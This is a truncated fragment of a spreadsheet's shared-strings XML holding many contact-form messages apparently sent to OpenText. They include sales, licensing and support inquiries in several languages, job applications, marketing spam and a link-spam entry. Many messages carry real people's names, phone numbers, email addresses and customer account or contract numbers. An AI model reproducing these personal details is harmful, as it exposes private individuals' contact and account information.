    <t>Les juges fédéraux canadiens utilisent FirstClass 12.122 pour leurs communications. Lorsqu'il s'agit d'imprimer les emails en Adobe PDF (voire à l'imprimante) à partir de cette application, les entêtes sont tronquées lorsque le nom et l'adresse de l'expéditeur, à titre d'exemple, sont longs; la date du courriel qui se trouve sur la même ligne est alors "écrasés" et disparaît. Le texte semble prendre trop de place sur le sens de la largeur. J'ai tenté de réduire la police de caractères, mais sans résultat. Avec une mise à l'échelle à 80% de l'impression, dans la plupart des cas, j'arrive à conserver le maximum des informations. Connaissez-vous ce problème et si oui, la solution? Sinon, voilà un irritant de taille que vous devriez régler! Gentiment proposé. -- Martin Vauclair</t>
  </si>
  <si>
    <t>Personalakte etc in der Cloud</t>
  </si>
  <si>
    <t>We have used PC Docs in the past.  I am looking for information/quote to convert from the current program we are using (MFiles).</t>
  </si>
  <si>
    <t>does open text have partners in kenya or nearby countries ..... we require more information on case 360</t>
  </si>
  <si>
    <t>EDMS for our client</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for _x000D_
_x000D_
OpenText Content Server Administrator Certification Program – OTCSSA </t>
  </si>
  <si>
    <t>Dear Sir, _x000D_
Does your software is free to use in company.</t>
  </si>
  <si>
    <t>do you supply brava desktop for window 8?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Please inform me following details if you have Vancouver IP windows VPS:_x000D_
_x000D_
1) IP is related to which city in Vancouver_x000D_
_x000D_
2) URL for pricing and cheapest plan_x000D_
_x000D_
Best Regards_x000D_
Yusef_x000D_
</t>
  </si>
  <si>
    <t>Need Access to the support site. I tried to register but I get an error. Please add me to the support site._x000D_
Company Name - Bio-Rad Laboratories_x000D_
Old Ticket Number : 3057277_x000D_
Contract Number:0012259562_x000D_
Renewal Number:RC196322_x000D_
Previous PO Number:4100001561_x000D_
End User Number : My Desk Number 510-741-4257</t>
  </si>
  <si>
    <t>Just a few end users will use it, looking for an on premise solution - no cloud or internet integration allowed. Just looking for general price to see if we can even entertain this as an option.</t>
  </si>
  <si>
    <t>Looking for outsourced EDI middleman.</t>
  </si>
  <si>
    <t xml:space="preserve">We are acquiring a company that uses opentext. Would like to talk to someone about setting up a new account, licensing. </t>
  </si>
  <si>
    <t>Interested in incorporating Magellan.</t>
  </si>
  <si>
    <t xml:space="preserve">How to create sub-questions on Qfiniti? Software version: 10.5. </t>
  </si>
  <si>
    <t>I would like to receive a brief demo of Live Link to learn about it's cloud-based group co-editing features with MSFT Word.  Can you reach out to me soon for our conversation?</t>
  </si>
  <si>
    <t>We'd like to obtain a price quote to upgrade from Spicer Imagenation 7.60 to OpenText Desktop Viewer 8.3</t>
  </si>
  <si>
    <t>We would like to explore the use of fax server. We currently are not running anything like that. Using individual fax machines/MFP.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I understand your participation at “GEOINT 2017 Expo” _x000D_
 _x000D_
Would you be interested in our newly updated “Security Industry Professionals Database” for your sales and marketing initiatives?_x000D_
_x000D_
Let me know your target audience, so that I can get back to you with updated information and few Samples just for your review._x000D_
 _x000D_
Target Industry      :  _x000D_
Target Geography :  _x000D_
Target Job Title      :  _x000D_
 _x000D_
Appreciate your time &amp; look forward to hear from you._x000D_
_x000D_
Best Regards,_x000D_
Sherry Hunt| Business Development coordinator_x000D_
_x000D_
_x000D_
Consumer List | Technology List | Healthcare list | Event Promotion | Email Appending | Email Campaigns | SEO |Content writing| Telemarketing services</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in getting some estimated pricing from you on complete records management solutions for managing boxed files, paper, electronic and email records. I am interested in knowing details regarding systems that use SharePoint as well as options that don't use SharePoint. This request is strictly for budget planning purposes at this point. Any purchase would need to go through a procurement process which we are not expecting to undertake until 2018 however this information is needed for budget approval requests. I have worked with OpenText in the past at Woolwich Township which is why I am reaching out to you today. Thank you in advance. _x000D_
Julie _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - I requested the following paper multiple times and never received it :_x000D_
Ovum Decision Matrix: Selecting a Web Experience Management Solution_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I worked for a manufacturing company that has several subsidiaries operating under independent and different IT systems (Kingdee, SAP, Macola, Shared folders). These subsidiaries need to share automatically some restricted data ( engineering design data) and I would like to discuss with you the solutions you could propose.  </t>
  </si>
  <si>
    <t>We want to acquire a 10 seat license of Open Text as soon as possible.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Je souhaiterais organiser un call avec un account manager Suisse Romande en fin de semaine/début de semaine prochaine._x000D_
Le but de ce call serait d’échanger autour de futurs besoins du TCS en ECM, et envisager les éventuelles réponses qu’OpenText pourrait y apporter._x000D_
Merci d'avance_x000D_
L. Coupin_x000D_
</t>
  </si>
  <si>
    <t>Would like to schedule a demo of LegalKey product.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
Currently we are on Rightfax version10.6, Enhancement Pack 2, Service Release 3, could you tell me when does the support for this version end. If you could send me the link that talks about it that will be great. Thank you_x000D_
_x000D_
If you could give me the link to rightfax’s current cloud solution version (instead of the client version which we currently use) that will be helpful. Thank you._x000D_
_x000D_
Sindhu_x000D_
613-260-6872_x000D_
</t>
  </si>
  <si>
    <t>We need to do a procurement of a CCM Solution and we would like to choose your offering for a best-fit review. Please advise whether we can discuss and progress to a face-to-face demon and presentation to best understand the offering within this domain. Please advise.</t>
  </si>
  <si>
    <t>My access to "My Support" appears to be disabled.  I would like to ask the reason it was disabled and what we can do to restore it soon.  My OpenText account is under my old email address: psherman@novell.com._x000D_
_x000D_
Thanks_x000D_
Paul</t>
  </si>
  <si>
    <t xml:space="preserve">Taxpayer Identification Request_x000D_
_x000D_
_x000D_
_x000D_
To Whom It May Concern:_x000D_
_x000D_
_x000D_
We are requesting your assistance in providing us with the information necessary to process payments to you.  The Internal Revenue Service requires us to receive and retain a Form W-9 from you to certify your name, address, U.S. residency status, taxpayer identification number, and backup withholding status. We only use your tax information for required governmental reporting purposes.  For your convenience we have attached a Form W-9 and you can also find a Form W-9 online at http://www.irs.gov/pub/irs-pdf/fw9.pdf.  _x000D_
_x000D_
Failure to provide the W-9 might result in delay of payment.  Failure to provide accurate reporting information on a Form W-9 may result in the IRS’ imposing penalties on you as the taxpayer._x000D_
_x000D_
To allow us to process any pending and future payments, please return a completed Form W-9 as soon as possible via email to AccountsPayable@Chemetall.com, fax to 908-464-5170, or via postal mail to: _x000D_
_x000D_
Chemetall now part of BASF Group_x000D_
Attention: Accounts Payable_x000D_
675 Central Avenue_x000D_
New Providence, NJ 07974_x000D_
_x000D_
_x000D_
If you have any questions, please call us at 1-844-424-5962_x000D_
_x000D_
_x000D_
Thanks for your cooperation._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need to talk to someone about Enterprise Content Management (ECM) - for a Healthcare customer </t>
  </si>
  <si>
    <t xml:space="preserve">We are preparing to issue an RFP to potentially replace our current web content management system.  We have identified OpenText as a company which has a product we think provides the functionality we are looking for.  If you would like to participate, please put me in contact with whoever I should work with. </t>
  </si>
  <si>
    <t>Hello. today we have the Quick scan ver.4.7 . we are trying to scan with new scanner that has ISIS level 4. the ver. we have does not support level 4. we need to upgrade our ver. to scan with the ISIS level 4. what do we need to do for that ?</t>
  </si>
  <si>
    <t>I am looking for technical and price details on Documentum.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sir, I would like to change my bank details. Kindly guide me._x000D_
</t>
  </si>
  <si>
    <t>We currently use an old version of Spicer Imagination (V7.4). and having trouble importing some customer .pdf's. Mostly it appears that the issue is with fonts, and with pdf's that were created by a third party pdf generator, although I'm not sure._x000D_
It appears that OpenText acquired Imagination but there is very little information about upgrades available. Is Imagination still available? Is there another product that has replaced Imagination?_x000D_
_x000D_
Thank you,_x000D_
Bill Brunelli</t>
  </si>
  <si>
    <t xml:space="preserve">We are in requirement &amp; looking to procure Myriad viewer software._x000D_
Could you please send us the licensing options along with the pricings in detail._x000D_
Appreciate if you consider this on high priority &amp; send the requested information._x000D_
Let me know if you have any queries._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear team,_x000D_
_x000D_
We have come across your profile while we are doing some research on billing related information. We would like to understand more regarding to the solutions that you can offer for billing. Could you please give me a call back or drop me a note to have a brief talk on this? _x000D_
 _x000D_
Thank you!_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Hilson Ng_x000D_
Associate Revenue Operations Specialist_x000D_
FedEx Express, APAC_x000D_
65.6823.7224 TEL_x000D_
fedex.com/sg_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in adding ISIS support to our web-based scan SDK. How can we do that? And any costs involved?  </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam,_x000D_
It is my honor to obtained your contact info from webpage._x000D_
Do you want the fastest way to connect with customers while also improving sales and reducing cost?_x000D_
Try Live800!_x000D_
Live800 improves sales and customer support with web live chat, email, superb data analysis, powerful CRM and AI-robot chat system. And it is also qualified for CMMI3 and provides live chat solutions for customer service. We have won the trust of many customers from all over the world. One of our key clients is the Chinese company Alipay._x000D_
_x000D_
Features about Live800,_x000D_
Live chat support,_x000D_
Multi-chat channel,_x000D_
Track visitors,_x000D_
Flexible design,_x000D_
Portable devices support,_x000D_
Multi-system integration_x000D_
Etc._x000D_
_x000D_
My contact details are below. Please call or email me if you are interested. I look forward to your reply._x000D_
_x000D_
Tracy Yu_x000D_
Skype&amp;Email: yushiyu@live800.com_x000D_
Web: en.live800.com_x000D_
</t>
  </si>
  <si>
    <t>We are a company that deals with scanning documents, we use the scan scan software, and until today we scanned the level 3 scanners, we purchased new scanners that require isis driver level 4, we want to get the driver in question according to our scanners._x000D_
To date, we have received service from EMC and we will be happy to work with you._x000D_
Best regards</t>
  </si>
  <si>
    <t>Die papierlose Reisekostenabrechnung. Scannen von Belegen direkt durch den Reisenden.</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Nous vous confirmons la réception de votre courrier concernant votre annonce importante et vous en remercions. _x000D_
_x000D_
Cependant, nous avons constaté que l’adresse est fausse. Je vous_x000D_
transmets ci-dessous l’adresse corrigée : _x000D_
_x000D_
Université de Lausanne _x000D_
Centre informatique _x000D_
Bâtiment Amphimax_x000D_
Quartier Sorge _x000D_
1015 Lausanne  _x000D_
_x000D_
Merci de la corriger.  _x000D_
_x000D_
Avec mes salutations les meilleures.  _x000D_
_x000D_
Klara Jovanovic_x000D_
Apprentie employée de commerce</t>
  </si>
  <si>
    <t>I have download First class but unable to register - I can't see any option to set up a password, etc. The following message always pop up: 'Sorry, you are not permitted to perform that function [1030]</t>
  </si>
  <si>
    <t>HI i am k. Chandra sekhar with hands on 2.5 years experience in wordpress, javascript, jquery, mysql, php, bootstrap, material design, html5, css3 In Aptagrim Consulting LLP Hyderabad.</t>
  </si>
  <si>
    <t>Please send me details on our support contract.</t>
  </si>
  <si>
    <t xml:space="preserve">how are u  ?_x000D_
sir i need a ur help i want rised fund for my sistr can u  help us personaly or anykind and share this to ur page if u can help this thank u soo much   this is page  _x000D_
i am very thank full to u if can help much appricated_x000D_
 _x000D_
 _x000D_
www.gofundme.com/alis-sisters-brain-surgery_x000D_
</t>
  </si>
  <si>
    <t>hello _x000D_
i would like to ask you for your trail version in order to test possible use of your system._x000D_
thanks</t>
  </si>
  <si>
    <t>Quote for Annual Maintenance Brava Enterprise viewer PIN 405094_x000D_
Partno: 373-BP-M_x000D_
Submission is on 15th looking to get the proposal by tomorrow.</t>
  </si>
  <si>
    <t>need first call will not let me in nedd help with first class and the site for time off thank you</t>
  </si>
  <si>
    <t>Hello. And Bye.  Hello. And Bye. _x000D_
[url=http://osdfjodsij9.ru]http://osdfjodsij9.ru[/url]</t>
  </si>
  <si>
    <t>I am looking for a tool that can perform sentiment analysis on large-sized text documents. Request you to provide details and the respective rates. Thank you.</t>
  </si>
  <si>
    <t>hello,_x000D_
i am looking for job as Developer in field of ASP.NET, if you have any requirement in this position please contact me and i am leaving in Bangalore,Karnataka,India so please please at least once referred me.</t>
  </si>
  <si>
    <t>I spoke with Steven Simpson previously about upgrading our version of DOCS Open 5.3.1 to eDOCS 16.1. I'm looking for guidance from the eDOCS Global Professional Services team on what steps will need to be taken to upgrade our existing system.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a quote for:_x000D_
Open Text		Report Capture Server, with Report Distribuion module (maintenance)     _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Greetings of the day!_x000D_
_x000D_
I am Sarah Jubar, Would you be interested in using our Potential Customer list who is interested in your products or services? We are a list compiler and a Dominant player in the Information Industry across UK, USA, Australia and Europe._x000D_
_x000D_
We have all varieties of Business records in Information Industry that comes with complete contact details including working Business email addresses._x000D_
_x000D_
We Can Provide you Some Specific Samples for data quality check_x000D_
_x000D_
Titles:_x000D_
_x000D_
•	Information Specialists/Managers_x000D_
•	Searchers/Examiners_x000D_
•	Information Analysts/Experts_x000D_
•	Scientific/Technical Science Experts_x000D_
•	Intellectual Property Specialists/Managers_x000D_
•	Competative/Business Intelligence Professionals _x000D_
•	Documentation Specialists/Managers_x000D_
•	Knowledge Management Professionals/Librarians_x000D_
•	Attorneys/Agents_x000D_
•	Researchers_x000D_
_x000D_
Sectors:_x000D_
_x000D_
•	Electronic  Records Management_x000D_
•	Adaptive  Case Mananagement_x000D_
•	Architecture/Technology_x000D_
•	Archiving/Big Data_x000D_
•	Building Business Case_x000D_
•	Business Process Management_x000D_
•	Change Management_x000D_
•	Cloud Computing_x000D_
•	Collaborating_x000D_
•	Consulting_x000D_
_x000D_
Please fill in your exact Target criteria in the below mentioned format, So that I can run counts and get back to you with samples and benefits for your review._x000D_
_x000D_
Target Job title : _________  Target Industry : ______________   Target Geography :_____________ _x000D_
_x000D_
Our list includes: Name, Job title, Company Name, Permission Based E-mail address, Contact number, Physical address and many more._x000D_
_x000D_
Look forward to your response. Thank you so much for reading my email even in your busy schedule._x000D_
_x000D_
Regards,    _x000D_
                                                                             _x000D_
Sarah Jubar_x000D_
Business Development Coordinator_x000D_
12840 NE 21st Place, Bellevue, WA 98005, United States_x000D_
Email: sarah.jub@outlook.com_x000D_
_________________________________________x000D_
                           If you no longer wish to hear from us please reply me with the subject line: "Leave Out"._x000D_
</t>
  </si>
  <si>
    <t>Interested in Content Server Training.</t>
  </si>
  <si>
    <t>I want to know the capability of your product to integrate it with SAP. Softtek is SAP Gold Partner and one of our customers is asking as to evaluate the possibility to connect Documentum with SAP, so we need to research what does your software offers about this, and how can we work together.</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have eFax/J2. We're considering back up options. Would like to understand true costs associated to implementing on-prem or hybrid solutions. </t>
  </si>
  <si>
    <t>Report Builder trial licence</t>
  </si>
  <si>
    <t>Wanting to know more about Open Text Media Manager</t>
  </si>
  <si>
    <t>Interested in a demo of Magellan, as well as pricing and deployment options.</t>
  </si>
  <si>
    <t>I am wondering if 2-0120 OpenText Records Management 10.5 is offered virtually in Canada.  We are located in Charlottetown, PE.  If so, could you provide dates / time, and cost information for the course.</t>
  </si>
  <si>
    <t xml:space="preserve">Another email needed!- David Harris Kolada_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
I am emailing to ask for the contact information (emails) of Tom Jenkins and Russ O'Neill , to send out Waterloo Innovation Summit information for this year. _x000D_
Thank you for the help,_x000D_
Natalie Oleksinski _x000D_
Community Relations and Events Coordinator_x000D_
University of Waterloo_x000D_
200 University Avenue West, Waterloo, ON, N2L 3G1_x000D_
cre@uwaterloo.ca_x000D_
519-888-4567 ext. 37599_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
I represent Softmart (www.softmart.by ), the reseller of wide range of software in Belarus. We have a client who is interested in purchasing Team Developer 6.3 – 1 license. _x000D_
Could you please provide me with the quote for the product with terms of purchase and delivery? Do you offer any reseller discount? _x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>I have submitted my resume for a job opportunity,but there is no response from your company.</t>
  </si>
  <si>
    <t xml:space="preserve">Merci de répondre à cette demande par mail. _x000D_
Plusieurs de nos collaborateurs sont intéressés par vos formations, pouvez-vous me communiquer votre numéro d'agrément afin que je puisse entrer votre organisme dans notre base de données ? _x000D_
_x000D_
Je vous en remercie par avance, _x000D_
_x000D_
Bien à vous_x000D_
_x000D_
www.probtp.com_x000D_
_x000D_
	Margaux RAVARY_x000D_
	Secrétariat _x000D_
	DDI/DIPI_x000D_
	PRO BTP - CTN Cagnes-sur-mer_x000D_
	_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are looking for invoice scanning solution which is able to capture key invoice details and export it to our ERP system for process. Hence, we would like to find out more about your product.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All, _x000D_
We are working on consulting assignment wherein we have to create an application selection work book, which will contain best of the breed application. This is Greenfield assignment which we are doing it for one of our Mining clients. Currently, we are at analysis stage, where we have to recommend best of the breed application to the client.  For one of their business capabilities, we have shortlisted  Opentext Rights management. To complete our analysis we need the following information :_x000D_
a.	Is solution available on the cloud?_x000D_
b.	What is the license options and deployment options? Per user/subscription /on-premise_x000D_
c.	What is the license cost?_x000D_
d.	IS this solution applicable for underground mines_x000D_
e.	What is database/OS/ and other technical requirements to install it._x000D_
Would really appreciate if you can provide the above information._x000D_
Looking forward to your reply.!_x000D_
Regards,_x000D_
Mayank Dusad_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I would like to enquire on behalf of my staff regarding the OpenText. My company is interest in purchasing the program for 1 year. Would it be possible to for us to have an invoice? Addition, I would need advice no how should I proceed to make a purchase._x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Cindy</t>
  </si>
  <si>
    <t>Hello.  We are currently Rightfax customers.  I would like to get information documentation about setting up OpenText RightFax SMTP Connector for HP MFP's.</t>
  </si>
  <si>
    <t>Interest in Media Bin DAM</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may apply, _x000D_
_x000D_
My name is Roshen Samuel and I am a Business Systems Analyst Intern at a pharmaceutical company named AbbVie. I am writing because the team that I am working with would love to learn more information about Actuate and how it could be a potential tool the team that I am working with could implement. _x000D_
_x000D_
The best number to reach me at is 1-847-505-9029, however I do have a preference for email. _x000D_
_x000D_
Thanks, _x000D_
_x000D_
Roshen Samuel </t>
  </si>
  <si>
    <t xml:space="preserve">We have interest in a document scanning and indexing system. I'm curious about your OpenText Imaging Enterprise product and it's fit with our goals. </t>
  </si>
  <si>
    <t>I need access to training offerings for Captiva.</t>
  </si>
  <si>
    <t>Olá,_x000D_
_x000D_
Gostaríamos usar uma VAN para coleta de arquivos CNAB dos bancos: Itaú, Bradesco e CEF, para nosso sistema de processamento de boletos._x000D_
_x000D_
Vocês tem essa solução com esses bancos ? Se sim gostaríamos de fazer um orçamento desse serviço, por favor._x000D_
_x000D_
Obrigado.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to introduce my company to you:_x000D_
_x000D_
Portable Insights, Inc. is a Warwick, Rhode Island-based marketing and opinion research company.  We conduct telephone and online marketing research as well as focus group and IDI recruitment for clients in the US and abroad. My colleagues and I are research industry veterans and we would appreciate an opportunity to work with you._x000D_
_x000D_
I wanted to reach out to you to find out how I could get an opportunity to work on your research projects such as any overflow research you may have or any projects that you require outside assistance on. _x000D_
_x000D_
Please feel free to reach out with any questions or needs. I appreciate any opportunity to earn your business. _x000D_
_x000D_
Have a great day,_x000D_
Francine_x000D_
 _x000D_
_x000D_
Francine Machado_x000D_
Portable Insights, Inc._x000D_
Account Executive_x000D_
401 Jefferson Blvd_x000D_
Warwick, RI 02886_x000D_
(401) 352-4005 ext. 213 Office_x000D_
(203) 413-6220 Fax_x000D_
francine@portableInsights.com_x000D_
www.PortableInsights.com_x000D_
</t>
  </si>
  <si>
    <t>Quote for 50 licenses/seats for OpenText Exceed OnDemand.</t>
  </si>
  <si>
    <t>Please email me on pricing for Implementation/Training and licensing for a 25 attorney / 45 employee Law Firm</t>
  </si>
  <si>
    <t>Can you please provide me with a quote for the below?_x000D_
_x000D_
Open Text Exceed Maintenance 100-199U_x000D_
_x000D_
PN: MAINT-EXMPI550700M-3_x000D_
_x000D_
 _x000D_
_x000D_
Open Text Exceed 3D Maintenance 100-199U_x000D_
_x000D_
PN: MAINT-EXMPI555700M-3 _x000D_
_x000D_
_x000D_
thank you!</t>
  </si>
  <si>
    <t>I'm looking to understand what may be required to migrate from our current DAM to Widen. Are there APIs avaialble to can help us load assets and associated metadata programatically prior to launch?</t>
  </si>
  <si>
    <t>We are construction company  looking for EDMS software to manage our documents and Automate our operations to increase the efficiency._x000D_
Do you have any reseller in East Africa or Tanzania or the nearest reseller who can support us</t>
  </si>
  <si>
    <t>SAP jobs are failing with TSV_TNEW_PAGE_ALLOC_FAILED errors when attempting to archive workflows._x000D_
_x000D_
"There is an applicable OSS Note (2133304) which appears to be the solution. Yesterday I ran a job in PRM which fails with the same error, then ran it excluding a certain task ID mentioned in this note – and the job was successful. But when executing the same variant including only the task ID, the job fails. So the note does appear to address the problem. However the WORKITEM job is currently running in production, and it has archived many rows with this same task ID. This leads me to believe that there are some rows with the task ID that are erroneous, which are causing the problem, but which have not been encountered recently. This explains why the error does not always occur. Another fact is that until very recently, WORKITEM archiving worked only on specific task IDs, and this one was not among them."_x000D_
_x000D_
The note says basically that OpenText needs to resolve the problem.</t>
  </si>
  <si>
    <t>How much for purchasing the license of EXCEED software. Please send the information to me by email.</t>
  </si>
  <si>
    <t>regarding the ticket OTCS Ticket 3093844. call me back</t>
  </si>
  <si>
    <t>Bonjour, puis-je recevoir, par courriel, de l'information sur Content Server dans le Cloud, en français, ,merci.</t>
  </si>
  <si>
    <t>I'm trying to access the OpenText Knowledge Center but not sure if Capita has an active account. We do run the OpenText Archive Server licensed via SAP however. I would like to access your knowledge Center to access resources related to VIM and ECM as we will be deploying these solutions very shortly and I need to understand the architecture.</t>
  </si>
  <si>
    <t xml:space="preserve">price for this product_x000D_
</t>
  </si>
  <si>
    <t>Interested in finding out if Opentext offers a web based fax blast solution with detailed reporting</t>
  </si>
  <si>
    <t>Hi, My name is Luis Medina i am the key account mgr for tropical vendors ( Egea inc) acct: US01-377750 ... could you provide some information  of what services you offering? .. any login?  ..every month we received a invoice for service "Active Catalogue" ..could you provide more info of what is this service? if any retail store is attach to this service ? ... former  office manager Johana Cotty made this enrollment  so ..please let me know how can get access to this service.  thanks for your help.</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
I am currently doing a business and IS analysis to implement an ECM solution for employee files of the University of Lausanne. Basically, we are looking for a solution that allows us to scan and manage employees' HR documents._x000D_
_x000D_
I would like to be in touch with one of your sales representative in order to ask questions about your solution (OpenText for SAP SuccessFactors)._x000D_
_x000D_
Best regards and thank you very much,_x000D_
_x000D_
Franck Canavesi</t>
  </si>
  <si>
    <t>Would like to understand more about your DAM, in particular:_x000D_
Integration with hybris CRM_x000D_
Option to provide as a cloud service _x000D_
Workflow and campaign management feature _x000D_
Accenture / open text relations and costs _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Pouvez-vous me rappeler asap, je suis revendeur de matériel et service informatique et j'ai besoin d'avoir une cotation pour un de mes clients_x000D_
Merci_x000D_
</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
One of our clients reached out to me and asked if we could resale Opentext Rightfax. We're a SI provider located in NYC and I am wondering if we already have an account with you or are eligible to resale. _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>We have the OpenText server with Gateway 2100's.  We'd like to see what the price would be for an additional power supply for this unit._x000D_
_x000D_
Thanks,_x000D_
Timothy</t>
  </si>
  <si>
    <t>Hello,_x000D_
EE, a company recently acquired by my company, BT, has 1,246 Opentext Exceed licenses. Now that EE is part of BT, employees of both companies would like to use the licenses and support service. Is this possible?_x000D_
Many thanks._x000D_
Best,_x000D_
Josh</t>
  </si>
  <si>
    <t>I would like a demo of eDocs connector for SharePoint 2013/O365.</t>
  </si>
  <si>
    <t>Hello - I am wondering if you can pass along some info to me regarding your ECM offerings as well as a point of contact?</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for your sales contact for Qatar market regarding the Knowledge base system  solution. _x000D_
Please urgently share the contact detail. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I would like to try the brava viewer for IBM Content Navigator 2.0.3. Can you send my a download link for a trial?</t>
  </si>
  <si>
    <t>We have a few changes to be made on already existing OpenText pages concerning _x000D_
_x000D_
1.MIRANDA Partners' new address http://www.opentext.com/what-we-do/partners-and-alliances/partner-directory/partner-directory-detail?id=0012000000HI659AAD _x000D_
2. DM Sync Manager (product) information http://www.opentext.com/what-we-do/partners-and-alliances/partner-solutions-catalog/partner-solutions-catalog-detail?id=a10D000000DpT0JIAV _x000D_
_x000D_
Can I get a web contact whom I can send the wished updates to? _x000D_
Kind regards, Hanne Vinsten</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sirs,_x000D_
one of our customers give us a mandate to buy 2pcs of the next licence: Opentext SSH Add-on license (Exceed 14)	2017.08.19.-2018.11.30._x000D_
Do you have Hungarian dealer chanel?_x000D_
How could we buy this licenses?_x000D_
Please help us to fullfil this assignement._x000D_
Kind regards_x000D_
Krisztian Volcsey_x000D_
Reworks Szerviz Kft._x000D_
</t>
  </si>
  <si>
    <t>Re: Google Manual Action Penalties_x000D_
_x000D_
Hello!_x000D_
_x000D_
Hope you are doing well._x000D_
_x000D_
I discovered some major issues in your website which might be the cause for the Google Penalties and poor search rankings of your website: _x000D_
_x000D_
* Your website has different adverse technical errors such as dead links, HTML errors, lost image alt tags etc. You can verify this by searching your website URL on validator.w3.org, brokenlinkcheck.com, feedthebot.com/tools/alt/_x000D_
_x000D_
* I found that there are various 'bad' links pointing to your website. You can confirm this by searching your website on the key search engines search boxes - Google, Yahoo &amp; Bing. Simply search by entering your website:  URL._x000D_
_x000D_
 * The number of quality and/or commanding Back links related to your website is very low. You can confirm this by simply visiting ahrefs.com_x000D_
_x000D_
* Duplicity in the contents has been found which can be negatively affecting your website search rankings. You can simply verify this at copyscape.com. _x000D_
 _x000D_
We can help you fix these problems and get your website ranking on the top page of Google, Yahoo &amp; Bing!_x000D_
_x000D_
We can help you develop the visibility of your website in all major Search Engines to increase website traffic, sales and popularity in the target area. _x000D_
If you are interested in receiving affordable Search Engine Optimization (SEO/SMO/SEM) done for your website, just email us back and get a full affordable SEO proposal._x000D_
_x000D_
Best Regards, _x000D_
Jenny Smith_x000D_
jennyseomarketing010@gmail.com</t>
  </si>
  <si>
    <t>To whom it may concern:_x000D_
May I ask for a price list for the TeleForm product line._x000D_
No need to call me - i know the product._x000D_
TIA, Lars Schärer</t>
  </si>
  <si>
    <t>I'm looking to automate negative news search process done manually by an in house team</t>
  </si>
  <si>
    <t>We need to understand open text VIM (Vendor Invoice Management) Solution and need implementation and licenses quotation for one of our regular customer in India. Please help us with the right partner in India who can support us for this.</t>
  </si>
  <si>
    <t>Online collaboration</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
One server where the software is inatalled is not listed in XDMCP Display Manager.Chooser._x000D_
_x000D_
Even if we did "/sbin/init.d/omni start" to start the service</t>
  </si>
  <si>
    <t xml:space="preserve">we are looking for replacement of our current Castelle Faxpress appliance. </t>
  </si>
  <si>
    <t xml:space="preserve">Assisting customer in reviewing OpenText products for BUDGET review.  Require indicative product pricing (RRP) AUD ex GST for review, product roadmapping and license agreement information._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We have received a letter from you regarding changes to your services.  I don't find any vendor information in our files.  Can you please advise who you are and what services you provide for Heritage Mint Ltd.</t>
  </si>
  <si>
    <t>I'm Aliwarman Tarihoran from PT. Hendevane Indonesia. Our customer has existing IP Telephony system using Cisco CUCM need to implement only voice Call Recording System._x000D_
_x000D_
Would you please to explain about your product and pricing. Our customer need to record all of voice call from 500 their employee IP Phone/seats.</t>
  </si>
  <si>
    <t>Need access to all HIT assets</t>
  </si>
  <si>
    <t>Hi there,_x000D_
I need access to all assets within the HIT asset library. I have access to the platform but am unable to see any assets._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Catalog Account #122129316376 _x000D_
Need new Login account</t>
  </si>
  <si>
    <t>USCG Quote request for Documentum renewal</t>
  </si>
  <si>
    <t>Hi, We're interested in your solution for organice, manage, control information, a product for content managment, that can integrate solutions like SAP, Sharepoint, etc._x000D_
We're in Colombia, ¿do you have a partner or can we do bussiness directly?_x000D_
Thanks._x000D_
Johan Romero</t>
  </si>
  <si>
    <t>I would like to get the Right Fax add In to work with Outlook 2013</t>
  </si>
  <si>
    <t>We are currently doing a review of needs and wants.  We are looking for a vendor and support team.  We are looking at several ERP and CRM products that we think would suit our needs but would like assistance from Open Text to assist us.</t>
  </si>
  <si>
    <t>WE NEED TO PROCURE THE SOFTWARE DO YOU HAVE ANY REPRESENTATIVE WITHIN EAST AFRICA</t>
  </si>
  <si>
    <t>I am wondering what the cost would be to get Open Text Live Link in the classroom for 20 students.  I teach Records Management and would like to have some hands on experience for the students using an Electronic Management System.  Please give me the cost (upfront and annual if necessary) and details of what would be involved in the setup/maintenance._x000D_
_x000D_
Sincerely,_x000D_
Lisa Gambin</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to request a copy of EasyLink Services International/Xpedite Systems LLC/Opentext's W9 form in order to update our vendor database. If you would kindly send the file to accountspayable@examworks.com, we would greatly appreciate it!_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Interest in information extraction capabilities</t>
  </si>
  <si>
